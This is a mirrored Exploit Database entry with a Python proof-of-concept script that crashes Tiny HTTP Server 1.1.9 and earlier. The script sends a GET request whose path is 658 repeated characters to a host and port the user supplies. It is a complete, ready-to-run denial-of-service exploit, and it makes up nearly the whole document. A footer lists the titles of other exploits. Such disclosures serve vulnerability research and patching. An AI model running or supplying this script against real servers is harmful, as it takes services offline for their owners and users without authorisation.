Tiny HTTP Server 1.1.9 – Remote Crash (PoC)

Exploit Database
13 阅读

作者： localh0t

日期： 2012-02-25
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/18524/

#!/usr/bin/python

# Tiny HTTP Server <=v1.1.9 Remote Crash PoC
# written by localh0t
# Date: 24/02/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Targets: Windows (All)

import httplib,sys

if (len(sys.argv) < 3):
	print "\nTiny HTTP Server <=v1.1.9 Remote Crash PoC"
print "\n	Usage: %s <host> <port> \n" %(sys.argv[0])
	sys.exit()

payload = "X" * 658

try:
	print "\n[!] Connecting to %s ..." %(sys.argv[1])
	httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
	httpServ.connect()
	print "[!] Sending payload..."
	httpServ.request('GET', "/" + str(payload))
	print "[!] Exploit succeed. Check %s if crashed.\n" %(sys.argv[1])
except:
	print "[-] Connection error, exiting..."

httpServ.close()
sys.exit()

last Exploits
Tiny HTTP Server 1.1.9 – Remote Crash (PoC)的更多信息

Microsoft Office 2007 – OneTableDocumentStream Invalid Object：
Adobe Flash – ATF Thumbnailing Heap Overflow：
Skia Graphics Library – Heap Overflow due to Rounding Error in SkEdge::setLine：
Microsoft Internet Explorer 8 – MSHTML ‘SRunPointer::SpanQualifier/RunType’ Out-Of-Bounds Read (MS15-009)：
netKar PRO 1.1 – ‘.nkuser’ File Creation Null Pointer Denial of Service：
Pure-FTPd 1.0.48 – Remote Denial of Service：
BWMeter 5.4.0 – ‘.csv’ Denial of Service：
Mosh – Remote Denial of Service：